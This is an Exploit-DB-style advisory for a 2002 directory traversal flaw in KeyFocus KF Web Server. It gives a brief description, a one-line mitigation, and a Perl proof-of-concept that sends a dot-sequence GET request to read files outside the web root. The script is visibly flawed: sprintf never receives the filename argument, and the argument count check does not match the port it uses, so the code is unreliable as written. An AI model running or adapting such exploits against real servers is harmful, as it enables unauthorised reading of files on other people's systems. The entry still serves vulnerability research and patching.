KeyFocus KF Web Server Directory Traversal Vulnerability

vendor:

KF Web Server

by:

SecurityFocus

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: KF Web Server

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

KeyFocus KF Web Server Directory Traversal Vulnerability

KeyFocus KF Web Server is vulnerable to a directory traversal attack due to its inability to properly handle file names containing consecutive dot characters. An attacker can exploit this vulnerability to break out of the web root and retrieve any file readable by the web server. Only files of recognized MIME types can be retrieved.

Mitigation:

Ensure that the web server is configured to properly handle file names containing consecutive dot characters.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6180/info

KeyFocus KF Web Server is vulnerable to a directory traversal attack. This is due to the web server's inability to properly handle file names containing consecutive dot characters. By exploiting this vulnerability, an attacker is able to break out of the web root and retrieve any file readable by the web server. Only files of recognized MIME types can be retrieved. 

#!/usr/bin/perl
use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp");
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n");
print $f $exploit;
undef $f;
}